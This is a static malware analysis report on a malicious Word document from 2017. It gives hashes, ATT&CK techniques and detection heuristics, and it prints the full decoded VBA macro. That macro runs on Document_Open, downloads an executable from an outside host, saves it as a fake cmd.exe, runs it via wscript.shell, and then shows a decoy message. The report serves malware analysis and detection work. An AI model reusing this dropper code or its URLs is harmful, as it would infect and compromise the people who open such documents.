Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1a4a4b5d6693f128…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 463.0 KB
Created: 2017-01-28 17:23:00
Authoring application: Microsoft Office Word
First seen: 2017-02-23
MD5: 7b14acdd2c78ba709d852a67397bff21
SHA-1: d0b4e491f2146ccfd0582f3b2e0f9e908c1ae754
SHA-256: 1a4a4b5d6693f128bbf914b561028ff0dc78bcfdd3b0bc745848ac5149d741b1
Risk score: 470

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer

The sample leverages a critical vulnerability (CVE-2007-3899) in Microsoft Word, indicated by multiple high and critical heuristic firings. The VBA macro uses `CreateObject("MSXML2.XMLHTTP")` and `CreateObject("wscript.shell")` to download a file from an embedded link, save it to disk, and then execute it. This behavior is consistent with dropper malware.

Heuristics (12)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical, CVE likely] CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Dropper.Agent-6412232-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA macros detected [medium, 6 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched line in script:
      mejdionq = "wscript.shell"
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
      ADOStream.Write XMLHTTP.responseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
      Set http = CreateObject(ghjuyfg)
  • cmd.exe reference in VBA [high] OLE_VBA_CMD
    Matched line in script:
      lqjeneik = "C:\Windows\Temp\cmd.exe"
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script:
      Sub Document_Open()
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs:
      • http://creatives.name/MdR85S (referenced by macro)
      • http://vialibrecartagena.org/fire.exe (referenced by macro)
      • http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2518 bytes
SHA-256: 758fee833ea8afb9247469ea5ac85475d1eaeeb04a35e41a4709212608e0f501

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
sdfsdgof = hjkfgh(True)
fsdcggfoqp = lqoqjmnen(False)
ghjuyfg = ikjsdhfh(True)
ghfhpzS = klqoijnu(False)
fghgh = lqjeneik(False)
dfg = mejdionq(True)
dfsg = dgdfgqew(True)
sdfdrf = lsojkasuj(False)
Set http = CreateObject(ghjuyfg)
http.Open sdfdrf, Replace(dfsg, "\", "/"), "False"
http.send
Set http = Nothing
ojfdsgi9u ghfhpzS, fghgh, sdfdrf, sdfsdgof, fsdcggfoqp
CreateObject(dfg).Run """" & fghgh & """"
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.Font.Color = wdColorWhite
Selection.Font.Bold = wdToggle
Selection.TypeParagraph
Selection.TypeText Text:="THANK YOU! SOON YOU WILL BE RECIEVE CONFIRMATION E-MAIL "

End Sub
Function ojfdsgi9u(ByVal URL$, ByVal LocalPath$, ByVal kdjfi$, ByVal ksdjf$, ByVal oertuiy$) As Boolean
Dim XMLHTTP, ADOStream, FileName
On Error Resume Next: Kill LocalPath$
Set XMLHTTP = CreateObject(ksdjf$)
XMLHTTP.Open kdjfi$, Replace(URL$, "\", "/"), "False"
XMLHTTP.send
If XMLHTTP.StatusText = "OK" Then
Set ADOStream = CreateObject(oertuiy$)
ADOStream.Type = 1: ADOStream.Open
ADOStream.Write XMLHTTP.responseBody
ADOStream.SaveToFile LocalPath$, 2
ADOStream.Close: Set ADOStream = Nothing
DownloadFile = True
Else
End If
Set XMLHTTP = Nothing
End Function
Function ikjsdhfh(ByVal kdjso$)
If kdjso$ = True Then
ikjsdhfh = "MSXML2.XMLHTTP"
End If
End Function
Function mejdionq(ByVal sdfgqw$)
If sdfgqw$ = True Then
mejdionq = "wscript.shell"
End If
End Function
Function dgdfgqew(ByVal kqorhnr$)
If kqorhnr$ = True Then
dgdfgqew = "http://creatives.name/MdR85S"
End If
End Function
Function lsojkasuj(ByVal jqoroej$)
If jqoroej$ = False Then
lsojkasuj = "GET"
End If
End Function
Function lqjeneik(ByVal klqlwo$)
If klqlwo$ = False Then
lqjeneik = "C:\Windows\Temp\cmd.exe"
End If
End Function
Function klqoijnu(ByVal ppqowo$)
If ppqowo$ = False Then
klqoijnu = "http://vialibrecartagena.org/fire.exe"
End If
End Function
Function hjkfgh(ByVal sdfgqw$)
If sdfgqw$ = True Then
hjkfgh = "Microsoft.XMLHTTP"
End If
End Function
Function lqoqjmnen(ByVal sdfgqw$)
If sdfgqw$ = False Then
lqoqjmnen = "ADODB.Stream"
End If
End Function